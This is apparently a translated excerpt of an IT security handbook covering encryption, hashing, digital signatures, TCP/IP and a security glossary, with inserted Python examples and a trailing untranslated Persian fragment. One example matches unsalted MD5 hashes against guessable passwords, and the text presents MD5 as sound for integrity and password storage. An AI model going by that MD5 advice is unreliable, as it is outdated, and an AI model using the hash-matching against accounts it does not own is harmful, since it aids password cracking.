Put simply, symmetric encryption resembles encoding in which all the original letters of the text change their appearance. One of the simplest encryption algorithms is to replace each letter with the letter that follows it. So in this method:
A is replaced by B;
B is replaced by C;
C is replaced by D;
...
X is replaced by Y;
Y is replaced by Z;
Z is replaced by A (at the end of the alphabet we return to the first letter).

If we use this algorithm, the example above becomes (ignoring the space and the period):
TFDVSJUZ JT JNQPSUBOU.
The message has now changed. The recipient reverses it, replacing each letter with the one before it, and in this way the original sentence is recovered.

Instead of shifting each letter by one position, we can shift them by several positions. As long as the recipient knows the size of the shift, they can decrypt the message.

The number of positions by which a letter is shifted is called the encryption key. This number is used both to encrypt the message and to decrypt it. Julius Caesar used this method to send his confidential and secret messages (he chose 3 as his encryption and decryption key).

With this simple algorithm, if your message is stolen and the thief grasps the general idea of the encryption, they may be able to work out its content by guessing. If the algorithm is too complex to be found by trying a few shifts, decryption becomes much harder. Until some time ago, numerous encryption algorithms used this simple shifting method.

Today, mathematical formulas are used for encryption instead of shifting letters. A key is still used, of course, and this key is part of the formula for performing the encryption. If you want to decrypt a message you must use a key. If you do not have the specific key, you can try other keys until you reach the answer. If the key is limited to the numbers 1 to 10, guessing does not take long. But if, say, it lies between 1 and 100, it may take a little more time. Today keys are usually 128-bit binary numbers. This amounts to roughly
340,000,000,000,000,000,000,000,000,000,000,000,000
different choices, which makes guessing the correct key practically impossible.

Symmetric encryption is used when the sender and the recipient can use the same key (in which case they must have agreed on a specific key). This method is used to encrypt a message when you want to move information from one place to another, for example over wireless communications, or when you want to encrypt the information on a disk so that others cannot read it. In the latter case, if the key is lost, your information is certainly lost as well.

Public Key Encryption

This type of encryption is similar to symmetric encryption, but with one major difference: instead of one key, there are two. Here the key used to encrypt the message is different from the key used to decrypt the encrypted message. Usually the first key is public and everyone is allowed to know it. If you want to send someone a private message, you must use that person's public key, which they have made available to everyone for encryption. Decrypting the message requires their private key, which is different from the public key and must never be given to anyone else. From this it is clear that if your message is sent to someone using this mechanism, no one other than the true recipient can read it.

Note that with this method the person is not sure who sent them the message, because anyone may have their public key. But the sender can be sure that only the owner of that public key (the key used for encryption) can decrypt and read the message with the corresponding private key.

Public and private keys can also be used the other way round. In that case you encrypt the message with your private key, and anyone who has your public key can decrypt it. What this proves is that the sender of the message is certainly none other than you.
One-Way Encryption Using Hashing

You can think of this method as public key encryption in which no one has the private key. So material can be encrypted but cannot be decrypted; its difference from public key encryption is that the encrypted message usually has a fixed maximum length. One of the most common one-way hashing algorithms is called MD5 (Message Digest 5). The output of the MD5 algorithm is always 128 bits (16 bytes). If you create a hash code for two different messages, the probability that the two hash codes will be the same is practically zero.

This method and the output code it produces have two main uses:

Integrity Assurance

You can take a long document or a program, compute its MD5 code and store it in a safe place. Some time later you can go back to your documents and apply the same operation again. Naturally, if the new code differs from the previous one, you know that the program or document has changed. Usually even a very small change in a large file causes large changes in the corresponding MD5 code.

Password Storage

On many systems, when a user chooses a word as a password, the word is encrypted using the MD5 algorithm (or a similar algorithm) and the encrypted version is stored. The next time the user tries to log in, what they enter is encrypted again and compared with what was stored on disk; if the two are identical, the password was correct. Of course, if the user forgets the password, what is stored on disk cannot be decrypted and a new password must be chosen. This method is used so that the original password can never be displayed in its original form.

Unfortunately there is still a problem, which is why users must not use short, simple or guessable passwords: if someone obtains a list of encrypted passwords (for example from a system they have broken into), it is very easy to encrypt all possible simple passwords and match them against the encrypted samples in the system, and so find the system's simple passwords.

Digital Signature

If someone wants to send you a private message and wants you to be sure that the sender is none other than them, a combination of the methods above can be used:
1. They write the message and use MD5 to create a hash code.
2. Using their own private key, they encrypt the hash code.
3. Using your public key, they encrypt the text of the message.
4. They send the message and the encrypted hash code.
5. You receive the message.
6. Using their public key you decrypt the hash code, which yields the original hash code.
7. You decrypt the text of the message using your own private key.
8. You compute the hash code for the text of the message using MD5.
9. If the two hash codes obtained are identical, you can be sure that the text has not been changed and that the sender is the person you expected.

Digital certificates, which web browsers use for secure authentication, also work on the basis of digital signature techniques (similar to the example above).
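The password-storage weakness described above can be shown in a few lines, together with the usual remedy. This is an added example, not part of the handbook: it stores passwords first as plain MD5, the scheme the text describes, and then as salted PBKDF2-HMAC-SHA256, which goes beyond the text; the record format, the iteration count and the sample users and passwords are assumptions made for the illustration.

```python
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 100_000  # assumption: work factor chosen for this example


def md5_record(password):
    """Storage as the text describes it: the bare MD5 code of the password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def md5_verify(password, record):
    """Login check: hash the entered password again and compare with the stored code."""
    return hmac.compare_digest(md5_record(password), record)


def users_with_guessable_passwords(stored, simple_passwords):
    """Audit a table of unsalted records against a list of simple passwords.

    Without a salt, one precomputed code per candidate is enough to test every
    account at once, which is the problem the text warns about.
    """
    precomputed = {md5_record(candidate) for candidate in simple_passwords}
    return sorted(user for user, record in stored.items() if record in precomputed)


def pbkdf2_record(password, salt=None, rounds=PBKDF2_ROUNDS):
    """Hardened storage: a random per-user salt plus a deliberately slow function."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${digest.hex()}"


def pbkdf2_verify(password, record):
    """Recompute with the salt and rounds stored in the record; False if malformed."""
    try:
        scheme, rounds, salt_hex, digest_hex = record.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        expected = bytes.fromhex(digest_hex)
        actual = hashlib.pbkdf2_hmac(
            "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(rounds)
        )
    except ValueError:
        return False
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    # Constructed accounts: two users happen to pick the same simple password.
    stored = {
        "alice": md5_record("sunshine"),
        "bob": md5_record("sunshine"),
        "carol": md5_record("v9!Lq-2xTr#77pd"),
    }
    print("identical unsalted records:", stored["alice"] == stored["bob"])
    print("flagged:", users_with_guessable_passwords(stored, ["123456", "sunshine"]))
    print("salted records differ:", pbkdf2_record("sunshine") != pbkdf2_record("sunshine"))
```

The salt removes the shared precomputed table, and the iteration count raises the cost of each guess; neither makes a short or simple password safe.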
Appendix 2
TCP/IP

The TCP/IP protocol is a set of rules that governs all messages sent over the Internet. Although ordinary users do not need to know about TCP/IP in order to use the Internet, they do need to know something about configuring firewalls and about Internet threats. A simple description of how TCP/IP works follows. If you are familiar with these concepts you can skip this section.

Internet Addressing

Every device on the Internet has an IP address. In general this address identifies the device uniquely, just as a postal address identifies the location of your house anywhere in the world. Addresses in the current version of TCP/IP (known as IPv4) are 32-bit binary numbers, which means the number of possible addresses is 2^32 = 4294967296. To make them easier to display and remember, the 32-bit binary numbers are divided into 4 parts of 8 bits each. Since 2^8 = 256, each 8-bit part can be one of the numbers 0 to 255. These 4 numbers are usually written one after another, separated by a dot. So the smallest Internet address is 0.0.0.0 and the largest is 255.255.255.255. An example of an IP address is 24.200.195.15. On the Internet there is a device called a router, which keeps the route for each IP address and knows which path to choose to reach each address.

Domain Name Services

Because long strings of numbers are hard to remember, many computers on the Internet are named with letters (called a hostname). An example is www.infodev.org. When you enter this name in a web browser, the computer sends a message to a special service called DNS. DNS can convert the letters into a number (in this example the number is 192.86.99.121). DNS also allows a web server to be moved between locations, because the domain concerned informs DNS of the new address and so users can continue to use the same hostname.

IP: Internet Protocol

When data is sent over the Internet it takes the form of a collection of characters and symbols called a packet or datagram. IP in TCP/IP stands for "Internet Protocol" and specifies what the internal format of these packets must be. An IP packet contains several pieces of information, among them the following:
• the size of the packet;
• the IP address of the recipient;
• the IP address of the place the packet is sent from; and
• the type of packet.

When a packet is sent from your computer it goes to the nearest router, which in turn tries to send the packet along the path to the next router, and this continues until the packet reaches its destination. If a problem arises or packet congestion is high, the packet cannot be sent and will be stopped along the way. For this reason IP is called an unreliable protocol. Although in theory IP is not reliable, in most cases it delivers all the packets sent to their destination.

There are different types of packets that can be sent, but here we mention only two of them: TCP and UDP.
TCP: Transmission Control Protocol[152]
TCP is the protocol used for most messages, including the web (HTTP), File Transfer Protocol (FTP)[153] and e-mail. In addition to the data being sent, TCP packets also include the following:
• a 16-bit sending port number[154];
• a 16-bit receiving port number[155];
• packet sequencing information[156]; and
• acknowledgement information[157].
Because each computer has only one IP address, the port number is used to indicate which program on the computer is sending or receiving the message. This is what makes it possible to have several web browsers open on one computer and to view the requested pages in each of them. For a program to receive a TCP message, it must wait for the message on the correct port. Usually there is a specific port for each particular application. For example, the web server port is always port 80. When you open a browser window, it picks a port for itself almost at random (by convention, greater than 1023), and that is the port on which it must wait for messages.
Because the length of IP packets is limited and the information transferred by applications may be far larger than that, the information has to be divided into smaller pieces. Each piece is sent in its own TCP packet. Sending the information with sequencing lets the receiving program reassemble the pieces in the correct order. For various reasons, however, some packets may reach the destination faster than others, which means that packets must be able to be received out of the order in which they were sent. On the other hand, since IP is in theory unreliable by nature, some packets may never reach the destination. In that case the receiving program notices that a gap has occurred in the sequence of received packets and can request that the lost packet be sent again.
When the sender sends a TCP packet, the receiving program is expected to acknowledge receipt by sending back special acknowledgement information. If the acknowledgement for a packet does not come back within a specified time interval, the packet is sent again. Because of the packets' sequence and acknowledgement numbers, TCP is a reliable protocol[158], and when an application uses it, the user can be sure that if a mistake or error occurs in transmitting or receiving information, the software will become aware of it.
152 Transmission Control Protocol
153 File Transfer Protocol
154 Sending Port Number
155 Receiving Port Number
156 Sequencing Information
157 Acknowledgement Information
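The sequencing, gap detection and retransmission described above for TCP, as an added Python sketch that is not part of the handbook. It is a toy model rather than a real TCP stack: sequence numbers starting at 0, the 8-byte piece size, the sample request and all names are assumptions of this example, and the retransmission timer itself is not modelled.

```python
"""Toy model of TCP-style sequencing and acknowledgement (not a real TCP stack)."""
from dataclasses import dataclass, field


@dataclass
class Segment:
    seq: int        # offset of the first payload byte within the whole message
    payload: bytes


def split_message(message: bytes, size: int) -> list:
    """Cut application data into pieces small enough for one packet each."""
    return [Segment(i, message[i:i + size]) for i in range(0, len(message), size)]


@dataclass
class Receiver:
    next_seq: int = 0                                 # next byte expected in order
    delivered: bytearray = field(default_factory=bytearray)
    pending: dict = field(default_factory=dict)       # seq -> payload held back

    def receive(self, seg: Segment) -> int:
        """Accept one segment in any order; return the acknowledgement number."""
        if seg.seq + len(seg.payload) > self.next_seq:    # not a pure duplicate
            held = self.pending.get(seg.seq, b"")
            if len(seg.payload) > len(held):
                self.pending[seg.seq] = seg.payload
            self._drain()
        return self.next_seq

    def _drain(self) -> None:
        """Hand over every buffered piece that now continues the stream."""
        for seq in sorted(self.pending):
            if seq > self.next_seq:
                break                                     # gap: keep waiting
            fresh = self.pending.pop(seq)[self.next_seq - seq:]
            self.delivered += fresh
            self.next_seq += len(fresh)

    def gaps(self) -> list:
        """Byte ranges (start, end) missing in front of buffered data."""
        missing, cursor = [], self.next_seq
        for seq in sorted(self.pending):
            if seq > cursor:
                missing.append((cursor, seq))
            cursor = max(cursor, seq + len(self.pending[seq]))
        return missing


def run_demo() -> dict:
    # Constructed sample: a 28-byte request split into 8-byte pieces.
    message = b"GET /index.html HTTP/1.0\r\n\r\n"
    sent = split_message(message, 8)                  # seq 0, 8, 16, 24
    rx = Receiver()
    # The network reorders the pieces and loses the one with seq 8.
    acks = [rx.receive(sent[i]) for i in (2, 0, 3)]
    gaps_seen = rx.gaps()
    # Sender side: every piece not covered by the last acknowledgement is
    # sent again once its timer expires; duplicates are harmless.
    last_ack = acks[-1]
    resent = [s.seq for s in sent if s.seq + len(s.payload) > last_ack]
    for s in sent:
        if s.seq in resent:
            last_ack = rx.receive(s)
    return {"acks": acks, "gaps": gaps_seen, "resent": resent,
            "final_ack": last_ack, "ok": bytes(rx.delivered) == message}


if __name__ == "__main__":
    print(run_demo())
```

The acknowledgement number stays at 8 until the missing piece arrives, which is exactly the signal the sender uses to decide what to send again.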
UDP: User Datagram Protocol[159]
UDP is a simple format used for transferring information. In addition to the data, each UDP packet also carries other information, including the following:
• a 16-bit sending port number; and
• a 16-bit receiving port number.
Here too, as with TCP, the use of port numbers means that different programs can receive and send UDP streams in parallel. Also, as when receiving a message in TCP, a program must wait on the correct port to receive a message. UDP has no specific provision for sequencing and acknowledging packets, so this protocol, like IP, is unreliable and messages sent with it may be lost. UDP is used where the loss of some messages does not matter much, or where there is a simple way to recover lost messages. One advantage of the protocol, however, is that because UDP has no acknowledgement or sequencing, it uses far fewer system resources.
158 Reliable Protocol
159 User Datagram Protocol
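An added example (not from the handbook) that reads the fields listed in this appendix out of raw packets: size, source and destination address and type from the IPv4 header, then the 16-bit ports and, for TCP, the sequence and acknowledgement numbers. The two packets are constructed in the code between documentation addresses; the function names are this example's own, and header checksums and IP options are not verified.

```python
"""Read the header fields named in this appendix from raw IPv4 packets."""
import struct

PROTOCOL_NAMES = {6: "TCP", 17: "UDP"}    # value of the IPv4 "protocol" byte


def dotted_to_int(address: str) -> int:
    """'a.b.c.d' -> the 32-bit number it stands for (four 8-bit parts)."""
    parts = address.split(".")
    if len(parts) != 4 or not all(
            p.isascii() and p.isdigit() and int(p) <= 255 for p in parts):
        raise ValueError(f"not an IPv4 address: {address!r}")
    value = 0
    for part in parts:
        value = (value << 8) | int(part)
    return value


def int_to_dotted(value: int) -> str:
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def parse_packet(packet: bytes) -> dict:
    """Return size, addresses, type and, for TCP/UDP, ports (plus seq/ack for TCP)."""
    if len(packet) < 20:
        raise ValueError("shorter than the minimum IPv4 header")
    ver_ihl, _, size, _, _, _, proto, _, src, dst = struct.unpack(
        "!BBHHHBBHII", packet[:20])
    header_len = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or header_len < 20 or not header_len <= size <= len(packet):
        raise ValueError("malformed or truncated IPv4 packet")
    info = {"size": size, "src": int_to_dotted(src), "dst": int_to_dotted(dst),
            "type": PROTOCOL_NAMES.get(proto, f"protocol {proto}")}
    body = packet[header_len:size]
    if proto == 6:
        if len(body) < 20:
            raise ValueError("truncated TCP header")
        sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", body[:14])
        data_off = (off_flags >> 12) * 4          # TCP header length in bytes
        if not 20 <= data_off <= len(body):
            raise ValueError("bad TCP data offset")
        info.update(src_port=sport, dst_port=dport, seq=seq, ack=ack,
                    data=body[data_off:])
    elif proto == 17:
        if len(body) < 8:
            raise ValueError("truncated UDP header")
        sport, dport, length, _ = struct.unpack("!HHHH", body[:8])
        if not 8 <= length <= len(body):
            raise ValueError("bad UDP length")
        info.update(src_port=sport, dst_port=dport, data=body[8:length])
    return info


def build_ipv4(proto: int, src: str, dst: str, body: bytes) -> bytes:
    """Sample-building helper: 20-byte header, TTL 64, checksum left at 0."""
    return struct.pack("!BBHHHBBHII", 0x45, 0, 20 + len(body), 0, 0, 64, proto, 0,
                       dotted_to_int(src), dotted_to_int(dst)) + body


def sample_packets() -> dict:
    # Constructed traffic between documentation addresses (RFC 5737).
    tcp = struct.pack("!HHIIHHHH", 49152, 80, 1000, 5000,
                      (5 << 12) | 0x018, 65535, 0, 0) + b"GET / HTTP/1.0\r\n\r\n"
    udp_data = b"status?"
    udp = struct.pack("!HHHH", 53000, 9999, 8 + len(udp_data), 0) + udp_data
    return {"tcp": build_ipv4(6, "192.0.2.10", "198.51.100.7", tcp),
            "udp": build_ipv4(17, "192.0.2.10", "198.51.100.7", udp)}


if __name__ == "__main__":
    for name, raw in sample_packets().items():
        print(name, parse_packet(raw))
```

The length checks matter in practice: a filter or logger that trusts the size and offset fields without comparing them to the bytes actually received can be made to read past the packet.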
Appendix 3
Glossary of technical terms
Definitions of terms used in security texts
E-mail[160]
The computer equivalent of postal letters. Electronic addresses can send or receive mail over the Internet. From the Internet's point of view, all e-mail consists of printable text (non-control ASCII characters).
Denial of service[161]
A denial-of-service attack occurs when a computer connected to the Internet is bombarded with a very large number of bogus messages, so that it spends all its time responding to them and no room is left for real user traffic to pass.
Keyloggers[162]
A program that records everything typed on the keyboard. The data can be written to disk or sent over the Internet to someone else. If keyloggers are installed on a computer, everything entered into it - such as a username and password - is recorded, exactly as if someone were standing over your shoulder while you enter your username and password!
Backdoor[163]
A method of bypassing the normal, secure way of logging in to a system and gaining control of a computer without the permission of its owner. If a backdoor is installed on a computer connected to a network, anyone on the Internet may be able to enter it and take control of it without the knowledge and consent of the computer's owner.
Firewall[164]
A firewall can block unexpected and unauthorized exchange of information between you and the outside world. Firewalls are of two kinds: a firewall can be software that runs on your computer, or a separate piece of hardware that watches what is received and sent on the network.
Encryption[165]
A method of hiding the content of information so that it cannot easily be read except by the person who is meant to receive it. Encryption uses a "key", created according to a set of rules, to change the appearance of the information. The information can be read only once it has been decrypted, and to decrypt it the recipient must know both the key and how to use it.
Buffer overflow[166]
A software flaw that occurs when a program moves its data into a space in memory that does not have enough room for the data. In this case the program may push earlier data out of memory while trying to make room for the new data. The loss of that data can cause many problems and usually compromises the integrity and security of the program. The problem can be prevented by checking that there is enough memory space before transferring the information into it.
Identity theft[167]
Identity theft occurs when someone has gathered enough information about you to be able to pass themselves off as you (for example at banks, shops, or government agencies).
Attachment[168]
An attachment is a part of an e-mail message that can be used to transfer all kinds of files, such as text and image files. All non-text files must be converted to printable form (plain text) in order to be sent. Everything stored on a computer is a combination of the digits 0 and 1. Put simply, encoding makes these zeros and ones sendable by converting them to plain text.
Username and password[169]
A confidential username and password that identify and authenticate a user to a computer system or website.
Open-source software[170]
Software whose program source is available to the public and that anyone can freely fix and change. Because the source is accessible, people can see how it works and change it as they wish. Authors of open-source programs usually encourage other programmers to take part in developing and extending the capabilities of these programs. Open-source programs also include free software, and many open-source programs - both those that are free of charge and those that are for sale - have capabilities similar to proprietary software that may be costly. Sometimes open-source programs are used, not free of charge, in parts of commercial programs under special agreements and licences.
For more information on this subject you can visit the following sites:
http://www.fsf.org
http://www.opensource.org
Backup[171]
The process of copying a computer's files to other locations on the same computer, or to peripheral devices that may be independent of that computer. Backups let you recover data that has been lost for any reason (for example accidentally deleted, physically damaged, or stolen).
Spam[172]
Advertisements and other e-mail messages that are sent to you without your having asked for them.
Virus[173]
The term "virus" has a specific meaning that is discussed further in later sections. At present, virus is applied to the whole set of programs that appear on your computer and that may also spread to other computers and do them serious harm.
URL[174]
A general address for referring to a destination on the Internet. For example http://www.infodev.org/ or mailto: [email protected]
Cookie
A file that is written to, or read from, the hard disk at the request of a remote website. The website asks for the file to be written on the computer in question so that it can read it again later. For example, if a website asks you for a username, it can store this information on your disk. When you visit that site again, the site reads the earlier cookie and finds out what your username was.
Daemon
A small program that is always running on your computer and waits for you to ask it to do something for you. Such a request is usually made over a network by a remote user.
HTML
HTML is an abbreviation of Hyper Text Markup Language. This language is a set of instructions that web browsers or e-mail programs can use to display text and images or to carry out other operations. An example of this language's instructions is:
This sentence is <<Start Bold>> very <<End Bold>> short.
In the sentence above, the words inside << >> indicate an action to be performed. As a result of these instructions, a sentence is displayed as follows:
This sentence is very short.
160 Email
161 Denial of Service
162 Keyloggers
163 Backdoor
164 Firewall
165 Encryption
166 Buffer Overflow
167 Identity Theft
168 Attachment
169 Username & Password
170 Open-Source Software
171 Backup
172 Spam
173 Virus
174 Universal Resource Locator
IT Security and Organizations
Chapter 1. Introduction
Chapter 2. Overview of methods for reducing the effects of e-security risks
Chapter 3. Risk assessment and loss analysis
Chapter 4. Planning for security needs
Chapter 5. Prevention and organizational security policy
Chapter 6. Personnel security
Chapter 7. Outsourcing security
Chapter 8. Privacy policies, legislation, and the drafting of government regulations
Chapter 9. Computer crime
Chapter 10. Mobile risk management: electronic financial services in the wireless environment
Chapter 11. Best practices: creating a culture of security
Chapter 12. E-commerce safety rules for all users and companies
Chapter 13. International dialogues on security
Chapter One
Introduction
As we saw in Part Two, users can do a great deal to protect their computers and the data stored on them. In small organizations, providing security may be simple, with everyone responsible for their own computers and files. For larger groups, however, such as organizations that deal with commercial transactions[1] or groups that hold confidential data on citizens or customers, the need to establish formal security policies and procedures becomes more important. When managers and employees take up the subject of IT security - whether in commercial companies, non-profit organizations, or government institutions - they will always face similar issues. Every group needs a certain level of security for its data, procedures that are clear and simple for staff to carry out, the ability to build and maintain awareness of customers' needs, and an understanding of how to implement security policies in an operational environment. In addition to these general needs, each category of organization also has particular considerations related to its own goals and mission. To achieve the goals that have been set, managers must pay close attention to information security policies. Understanding the costs of implementing effective security policies is also very important. Security technologies and procedures are a kind of investment and must be evaluated in light of the cost of probable losses. The practical recommendations of Part Three are presented with an understanding of cost-benefit analysis, which is essential in an environment with limited resources.
1 Commercial Transactions
Some statistical indicators of IT security in organizations
Ernst & Young's[2] Global Information Security Survey of 2003 shows that 90% of organizations believe information security is highly important for achieving their overall objectives. 78% of organizations stated that their first goal in working to secure information is reducing risks[3]. These organizations included 1000 wealthy companies that had allocated part of their resources to combating security problems. The survey goes on:
• More than 34% of organizations state that they do not have adequate ability to determine whether their systems are currently under attack.
• More than 33% state that they are not able to respond appropriately to security incidents.
• Only 34% of organizations claim to be prepared to comply with applicable security regulations.
• 56% of organizations regard insufficient budget as the main obstacle to effective information security.
• About 60% of organizations state that they rarely or never calculate return on investment for information security.
• Only 29% of organizations cite employee training and awareness as the area in which they have invested most for information security, against 83% that name technology as their top investment priority in securing information.
• Only 35% of organizations state that they have continuous awareness and training programmes for staff.
These figures indicate that all organizations - small and large - feel the financial and psychological pressure of IT security threats. The following chapters of this part deal with the priorities and concerns of small and medium-sized organizations. At the same time, it seems useful to keep in mind the results of the Ernst & Young survey as a symbol of the challenges that a number of business organizations have faced.
2 Ernst & Young
3 Risks
Small and medium-sized businesses[4]
If you are engaged in a small or medium-sized business, your main priorities are profitability, business continuity, stability, and the quality of service to the customer. Small and medium-sized organizations are constrained by local, regional, or national laws, and depending on the type of business they engage in and the business environment of the country they operate in, they may have to answer to several authorities. In these organizations the process of establishing security will focus on protecting the organization and its customers against fraud and against serious, costly attacks on services and systems. In addition to computer crime and network security, data protection also matters to small and medium-sized organizations, and it divides into two main areas: protecting organizational data against spies or organized attackers[5], and protecting customer data such as credit card and financial transactions.
4 The definition of small and medium-sized organizations varies from country to country. In some cases a single owner handles every aspect of a traditional business, such as farming or grocery retail; that is, the owner is the only employee of the business. In more complex businesses, several hundred people may work solely on consumer products or technical products. In the developed world, companies that start out relying on technology fall into the group of small and medium-sized organizations, but they may receive investment from investment groups, grow rapidly, or be bought by large companies. Some very successful small and medium-sized organizations issue shares and themselves turn into large public companies.
5 In general, organized espionage is a concern in large companies or in companies that produce products based on new technology, where innovation is highly valuable and may be stolen. For organizations engaged in commerce, eavesdropping is a more serious concern than espionage, although the effects of the two are similar. In particular, every company must protect its accounting records, staff information, and credit card transaction information from unauthorized access.
Non-profit organizations
In non-profit organizations, managers and staff put the emphasis on influencing the market, cooperating with communities and partner companies, and gaining reputation. Systems may be costly, and because of budget constraints in non-profit institutions they are usually of lower quality. In addition, staff usually have less experience with technical work, and so they may run into difficulties when they want to provide continuous service to clients and to present donors, supervisors, and partner institutions with a positive image of the institution's status and activity.
Universities
Like non-profit organizations, university systems also face issues such as budget constraints, costly networks, and a wide range of technical skills. Universities may face a set of internal threats, especially where, for example, students want to break into the university's facilities system to fill their spare time! In addition, universities may operate under unified policies and may also be required to implement government regulations. In the university environment, protecting personal data is very important, because student files contain important information such as identification numbers, medical records and educational records. Potential attackers can steal, alter, or destroy such data, and in doing so seriously damage the university's reputation.
Government organizations
The implementation and deployment of information technology in government organizations may be assessed on the basis of efficiency, ease of use, and the ability to communicate with other departments and organizations. Since profitability is generally not an issue in government settings, here too, as in non-profit institutions, the budget is controlled, and this limits the organization's ability to procure the latest security hardware and software. At the same time, governments must also focus on data protection, because their databases contain sensitive information about individuals: information such as personal details and medical, criminal, and tax records. Unfortunately, even in the government organizations of industrialized countries, data protection is troubled, suffering from obsolete systems, inadequate investment, and worn-out staff who lack the necessary competence in IT security. Like commercial companies and non-profit institutions, government too must care about the public image created of it once any intrusion or other security incident becomes news.
UNDP[6], in its recent report on the state of information technology in developing countries, outlined some of the challenges that individuals and organizations face in the information age.[7] The World Bank has produced several series of reports on the development and deployment of information technology.[8] Although the technical experience of organizations in the industrialized world differs in some respects (scale, costs, and the staff knowledge base), many lessons can be learned from their strengths and weaknesses in the area of IT security. Large enterprises are fewer in number, and each has special capabilities and greater financial resources. Nevertheless, there are still tensions among chief security officers as heads of cost centres, chief financial officers as cost controllers, and other branches of the organization (chief information officers, sales and marketing, and products).[9]
Without an overall plan for creating a secure IT environment, each department may develop a security solution that stems from the missions, goals, and operational objectives of that department alone, and that, however suitable it is for one department, may be of little use to the others. These differing solutions may result in security being over-provided in some areas and under-provided in others, whereas oversight by senior management will ensure that security practices are arranged so that the organization as a whole can perform better. The policies and technical implementations needed to set up an effective security system for the organization form a necessary and fundamental part of the business objectives, one that every organization must value.
6 United Nations Development Program
7 See the Human Development Report 2001: "Making New Technologies Work for Human Development" (UNDP: NY, 2001)
8 For resources, see the World Bank website and also the research projects and results available at the IT Governance Institute (ITGI):
http://www.worldbank.com
http://www.itgi.org
9 In larger technical companies, or in start-ups that plan to grow rapidly, the management team is made up of individuals each of whom specializes in one business or technical area. These roles include (but are not limited to) the following: chief executive officer (CEO), chief financial officer (CFO), chief technology officer (CTO), chief information officer (CIO), and recently chief security officer (CSO). An ordinary organization also has a series of vice-president positions, such as vice-president of marketing, of sales, and of business development. Since using this formal structure is not necessary (or not feasible) in smaller organizations, seeing how responsibilities are divided in large companies, and noting the growing importance of the CSO, can be very useful.
Small and medium-sized organizations: engines of growth and progress
Small and medium-sized organizations have fewer resources for start-up, a flatter management structure, and greater reliance on the staff knowledge base. In these organizations business processes may be more transparent than those of large organizations, and so in such a structure, where this much company information is accessible to all staff, there will be inherent security risks. In organizations that pay no particular attention to technology, the organization may be vulnerable to an employee or consultant who is technically stronger than the company's managers. In a company operating at the leading edge of technology, there is a risk that ownership of its innovations and vital resources is not adequately protected from theft or sabotage.
To counter these problems, all small and medium-sized organizations must carry out a thorough review of their missions, goals, competencies and information systems. If they operate in areas that may pose security risks to others - for example the area of developing technologies - they must anticipate probable threats to the security of their customers and draw up plans to reduce their impact. If they work in areas that relate in any way to state security - such as providing telecommunications products and services - they must be aware of when and how legal responsibility for complying with government rulings falls on them. An Internet service provider (ISP)[10] is an example of a company that faces both kinds of risk. Connecting the customer to the Internet creates security risks for the customer's data and equipment, and by providing digital content and communication tools, the ISP becomes subject to national rulings and regulations. If e-commerce capability is added to these services, potential threats and the assurance of meeting obligations turn into very large and fundamental problems.
The dangers of multiple threats
Statistical data from several reliable sources show a rising trend in the use of malicious programs to achieve criminal ends. In 2002 numerous reports concerned matters such as identity theft using malicious programs, politically motivated defacement of websites, distributed denial-of-service (DDoS)[11] attacks against specific organizational targets, and other similar cases.
In addition, the spread of blended threats[12] on the Internet creates serious risks for everyone. These risks do not belong to any particular area but threaten the whole global network. For example, the Klez worm was written with characteristics that lead experts to believe it was written either in China or in Hong Kong. At present, Asian countries are making increasing use of Internet-connected computers. Unfortunately, many of these computers are unprotected and their users are unaware of the basic principles of safe computer use. As a result, regions with high technical growth - such as China - are likely to come under attack from attackers around the world through the spread of viruses, worms, Trojans, and blended threats that combine all of these elements.
Current software tools provide a range of protections against malicious programs, but they are incapable of complete defence against all forms of attack. Using a layered defence scheme, both technical and human, greatly reduces the risk of security incidents caused by malicious programs, although it still does not eliminate it. Blended threats such as Code Red, Slammer, Klez, and Bugbear can plague computer networks persistently. Many worms have no destructive effects of their own, but they install traps in the system that make access to the network quick and easy for people who are familiar with those traps.
Apart from this, worms are in some respects more effective at disabling systems, because they are able to exploit vulnerabilities in common software such as web browsers.
In computing environments with these characteristics, users must increase their knowledge of the existing risks and of how to react appropriately in individual situations. When safe computer use is practised, the risk of an attack can be reduced considerably, but it is stressed again that it can never be brought to zero. Since the threat of deliberate sabotage of computer systems is very high for organizations, it is very important to examine the risks to individual security and financial transactions, and the new challenges that have arisen on wireless computing platforms.
10 Internet Service Provider
11 Distributed Denial of Service Attack
12 Blended Threats
‫ﻣﺰﺍﻳﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﻣﺪﻳﺮﻳﺖ ﺁﻥ‬
‫ﻋﻠﻴﺮﻏﻢ ﭼﺎﻟﺸﻬﺎﻱ ﻣﻮﺟـﻮﺩ‪ ،‬ﻣـﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﺁﻓﺮﻳﻨـﺎﻥ ﺑﺨـﺸﻬﺎﻱ‬
‫ﺩﻭﻟﺘــﻲ ﻭ ﺧــﺼﻮﺻﻲ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣــﺎﻝ ﺗﻮﺳــﻌﻪ ﺑــﻪ‬
‫ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺭﻭﻱ ﻓﻨﺎﻭﺭﻱ ﻧﻮﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷـﺎﻣﻞ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻲﺳﻴﻢ‪ ،‬ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﺗﺠﺎﺭﻱ ﻣﺸﻐﻮﻟﻨﺪ ﺗﺎ ﺑﻪ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎﻱ ﺭﻭﺯﻣﺮﺓ ﺧﻮﺩ ﻛﻤﻚ ﻛـﺮﺩﻩ‬
